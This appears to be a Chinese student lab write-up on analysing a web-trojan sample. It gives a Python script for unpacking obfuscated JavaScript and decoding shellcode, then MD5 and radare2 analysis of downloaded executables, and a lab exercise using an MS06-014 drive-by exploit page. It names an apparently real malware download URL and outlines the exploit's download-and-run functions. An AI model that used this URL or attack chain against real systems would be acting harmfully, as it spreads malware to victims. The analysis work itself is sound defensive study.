# eval(function(p,a,c,k,e,d){...}('payload',10,196,'sym|tab|...'.split('|'),0,{}))
m = re.search(r"\}\('(?P<p>.*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*'(?P<k>.*)'\.split\('\|'\)", text, re.S)
if not m:
raise SystemExit('packer arguments not found')
payload = m.group('p')
base = int(m.group('a'))
count = int(m.group('c'))
words = m.group('k').split('|')
# This sample's encoder is e=function(c){return c}, so tokens are decimal numbers.
unpacked = payload
for i in range(count - 1, -1, -1):
if i < len(words) and words[i]:
unpacked = re.sub(r'\b{}\b'.format(re.escape(str(i))), words[i], unpacked)
out = path.with_name(path.name + '.unpacked.js')
out.write_text(unpacked, encoding='utf-8', errors='ignore')
# Extract ordinary URLs and URLs hidden as %xx / %uXXXX shellcode.
urls = set(re.findall(r'https?://[^"\'\s<>]+', unpacked))
# Decode percent-encoded chunks such as %68%74%74%70 and %u7468%u7074.
def decode_percent_u(s):
data = bytearray()
i = 0
while i < len(s):
if s.startswith('%u', i) and i + 6 <= len(s) and re.match(r'[0-9a-fA-F]{4}', s[i+2:i+6]):
val = int(s[i+2:i+6], 16)
data += val.to_bytes(2, 'little')
i += 6
elif s.startswith('%', i) and i + 3 <= len(s) and re.match(r'[0-9a-fA-F]{2}', s[i+1:i+3]):
data.append(int(s[i+1:i+3], 16))
i += 3
else:
data += s[i].encode('latin1', errors='ignore')
i += 1
return data
# Analyze unescape(...) arguments, including concatenated strings such as
# unescape("%u...." + "%u....").
shell_dump_parts = []
for expr in re.findall(r'unescape\((.*?)\)', unpacked, re.S):
pieces = re.findall(r'["\']([^"\']*)["\']', expr, re.S)
if not pieces:
continue
q = ''.join(pieces)
raw = decode_percent_u(q)
shell_dump_parts.append(raw)
for enc in ('latin1', 'utf-16le', 'ascii'):
try:
decoded = raw.decode(enc, errors='ignore')
except Exception:
continue
for u in re.findall(r'https?://[^\x00\s"\'<>]+', decoded):
urls.add(u)
shell_path = path.with_name(path.name + '.shellcode.bin')
shell_path.write_bytes(b''.join(shell_dump_parts))
print('input:', path)
print('base/count:', base, count)
print('word-table:', len(words))
print('unpacked:', out, out.stat().st_size, 'bytes')
print('shellcode-bin:', shell_path, shell_path.stat().st_size, 'bytes')
print('urls:')
for u in sorted(urls):
print(' ' + u)
print('\n--- unpacked head ---')
for n, line in enumerate(unpacked.splitlines()[:80], 1):
print('{:02d}: {}'.format(n, line[:220]))
2.2.13 http://down.18dd.net/bb/bd.cab的md5加密是1c1d7b3539a617517c49eee4120783b2
这是一个压缩包,解压后发现一个exe
2.2.14 将这些文件md5后计算散列,发现都是一样的,所以只需要分析一个文件
| 文件 | URL MD5 / hashed 文件名 | 文件 MD5 |
|---|---|---|
| 014.exe | ca4e4a1730b0f69a9b94393d9443b979 | 1290ecd734d68d52318ea9016dc6fe63 |
| bf.exe | 268cbd59fbed235f6cf6b41b92b03f8e | 1290ecd734d68d52318ea9016dc6fe63 |
| pps.exe | ff59b3b8961f502289c1b4df8c37e2a4 | 1290ecd734d68d52318ea9016dc6fe63 |
| bd.exe | 994f7810e6a461292cc337bf73981e2c | 1290ecd734d68d52318ea9016dc6fe63 |
2.2.15 选择bd.exe打开
使用kali自带的radare2,使用命令r2 /home/kali/Desktop/1c1d7b3539a617517c49eee4120783b2_extracted/bd.exe
然后再输入izz,即可查看字符串信息,发现它还会继续下载很多其他文件
2.3 攻防对抗实践—web浏览器渗透攻击攻防
2.3.1 攻击方
用第一个小实验的方法生成攻击url
2.3.2 防守方
2.3.2.1 用靶机访问 http://192.168.232.132:8080/jX7x25DNvN ,选择查看源代码,发现有很多空白部分
2.3.2.2 使用html压缩工具查看源代码
整个 HTML 只有 3 个核心函数 + 页面加载触发,无任何正常网页内容:
BSjZplMwvWfweJYkOd:漏洞利用工具函数,尝试各种方式创建 COM 对象(系统组件)
yifpoGHRYzhIwfmAxvQacKLXvsrLxHM:核心攻击函数,下载、保存、运行恶意程序
KlEOOdhhEZzBHg:攻击入口函数,遍历漏洞 CLSID,触发攻击
2.3.2.3 这个html里id为BD96C556-65A3-11D0-983A-00C04FC29E36,就是MS06-014漏洞
3.学习中遇到的问题及解决
- 问题1:十六进制解码后的代码中有大量的\x
- 问题1解决方案:这不是纯粹的十六进制加密,而是JavaScript 字符串转义,用写好的脚本对其进行逆转义
4.实践总结
通过本次实验可以看出,网页木马通常不会只依赖单个文件完成攻击,而是通过多层跳转、脚本混淆、漏洞检测和恶意程序下载构成完整攻击链。分析此类样本时,应按照“入口页面 -> 外部脚本 -> 解混淆 -> shellcode -> 下载文件”的顺序逐层追踪。实验也让我认识到,静态分析时应避免直接运行恶意程序,优先使用 strings、file、md5sum、radare2、脚本解码等方式进行安全分析。
浙公网安备 33010602011771号